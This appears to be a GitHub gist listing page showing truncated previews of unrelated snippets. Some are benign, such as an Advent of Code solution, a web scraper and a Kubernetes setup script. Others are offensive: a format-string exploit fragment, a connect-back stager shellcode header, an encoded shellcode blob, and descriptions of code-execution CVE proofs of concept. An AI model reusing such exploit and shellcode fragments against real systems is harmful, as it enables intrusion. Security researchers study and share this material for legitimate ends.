Skip to content

Instantly share code, notes, and snippets.

View x0nu11byt3's full-sized avatar

x0nu11byt3

88 followers · 270 following
View GitHub Profile
@LiveOverflow
LiveOverflow / asd.py
Last active October 14, 2024 23:18
C Application Firewall
import struct
import socket
s = socket.socket()
s.connect(('127.0.0.1', 1337))
r = s.recv(1024)
s.send("%p,%p,%p\n")
while ',' not in r:
r = s.recv(1024)
start_buf = int(r.split(',')[1], 16)-9
@geohot
geohot / aoc16.cc
Created December 16, 2019 17:02
AoC 16 Part 2, works for all offsets
#include <vector>
int main() {
//char cdat[] = "12345678";
char cdat[] = "59791911701697178620772166487621926539855976237879300869872931303532122404711706813176657053802481833015214226705058704017099411284046473395211022546662450403964137283487707691563442026697656820695854453826690487611172860358286255850668069507687936410599520475680695180527327076479119764897119494161366645257480353063266653306023935874821274026377407051958316291995144593624792755553923648392169597897222058613725620920233283869036501950753970029182181770358827133737490530431859833065926816798051237510954742209939957376506364926219879150524606056996572743773912030397695613203835011524677640044237824961662635530619875905369208905866913334027160178";
//char cdat[] = "03036732577212944063491565474664";
int N = strlen(cdat)*10000;
int *dat = new int[N];
int *cc = new int[N+1];
for (int j = 0; j < N; j+=strlen(cdat)) {
@JohnTroony
JohnTroony / reverse_stager_shellcode.asm
Last active July 14, 2025 20:42
x86 Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.
; John (Troon) Ombagi
; Twitter/Github : @johntroony
global _start
section .text
_start:
; Create new stack frame
@jesusmartinoza
jesusmartinoza / scrapper.py
Created October 17, 2019 05:06
Simple Web Scrapper using Selenium and Beautiful Soup. Example, download Pokemon sprites
from selenium import webdriver
from bs4 import BeautifulSoup
import urllib.request
import os
import requests
driver = webdriver.Chrome("./chromedriver")
# Set the URL you want to webscrap from
# Example website with tons of Pokemon Sprites
@stong
stong / shellcode.txt
Created June 19, 2019 13:46
5 c at 5 b at jut Yet At At At At At At At At At At At At Pt Pt jut jut jut jut Qt jut at 111 1 t t t t t t t t t t t t t t t t Pt Pt Pt Pt jut j j j j at Bet At j Qt Rt St j j j j at 4 Kt Qt Qt Rt St j j Pt j at 311 1 t t 321 1 111 1 Bet Bet At t Qt Yet u h a a a a Q X 4 y P Y I I I I I I I I I I I I I I I I I 7 Q Z j A X P 0 A 0 A k A A Q 2 A B 2 B B 0 B B A B X P 8 A B u J I 4 q Y P M I F 0 u 8 V O v O 3 C 5 8 U 8 T o P b b I 2 N l I i s R p q C K 9 y q N P d K z m m P A A X X X X X X X X X X X X X
@dhondta
dhondta / README.md
Last active June 9, 2025 07:59
Proof-of-Concept for Python parso Cache Load Vulnerability (CVE-2019-12760)

CVE-2019-12760 - ACE in Python's parso Module

Description

** DISPUTED ** A deserialization vulnerability exists in the way parso through 0.4.0 handles grammar parsing from the cache. Cache loading relies on pickle and, provided that an evil pickle can be written to a cache grammar file and that its parsing can be triggered, this flaw leads to Arbitrary Code Execution. NOTE: This is disputed because "the cache directory is not under control of the attacker in any common configuration."

References

@dhondta
dhondta / README.md
Last active June 9, 2025 08:00
Proof-of-Concept for python-xdg 0.25 Python code injection (CVE-2019-12761)

CVE-2019-12761 - Code Injection in Python's xdg Module

Description

A code injection issue was discovered in PyXDG before 0.26 via crafted Python code in a Category element of a Menu XML document in a .menu file. XDG_CONFIG_DIRS must be set up to trigger xdg.Menu.parse parsing within the directory containing this file. This is due to a lack of sanitization in xdg/Menu.py before an eval call.

References

@netspooky
netspooky / bye.asm
Last active June 23, 2021 01:06
For write up
; 84 byte LINUX_REBOOT_CMD_POWER_OFF Binary Golf
BITS 64
org 0x100000000
;---------------------+------+------------+------------------------------------------+-----------------------------+----------+
; CODE LISTING | OFFS | ASSEMBLY | CODE COMMENT | ELF HEADER STRUCT | PHDR |
;---------------------+------+------------+------------------------------------------+-----------------------------+----------+
db 0x7F, "ELF" ; 0x0 | 7f454c46 | PROTIP: Can use magic as a constant ;) | ELF Magic | |
_start: ;------|------------|------------------------------------------|-----------------------------|----------|
mov edx, 0x4321fedc ; 0x04 | badcfe2143 | Moving magic values... | ei_class,ei_data,ei_version | |
mov esi, 0x28121969 ; 0x09 | be69191228 | into their respective places | unused | |
@netspooky
netspooky / exit.asm
Last active June 23, 2021 01:10
For writeup
BITS 64
org 0x100000000 ; Where to load this into memory
;----------------------+------+-------------+----------+------------------------
; ELF Header struct | OFFS | ELFHDR | PHDR | ASSEMBLY OUTPUT
;----------------------+------+-------------+----------+------------------------
db 0x7F, "ELF" ; 0x00 | e_ident | | 7f 45 4c 46
_start: mov al,0x3c ; 0x04 | ei_class | | b0
; 0x05 | ei_data | | 3c
@qzchenwl
qzchenwl / setup.sh
Last active March 29, 2021 06:42
k8s-master on centos7
# 0. SYSTEM INFO & CLUSTER ARCH
# CentOS 7
#
# +------------+ +-----------+
# | k8s-master |>192.168.99.20 -- 192.168.99.21<| k8s-node1 |
# +------------+ +-----------+
# v v
# internet internet
#
# /etc/hosts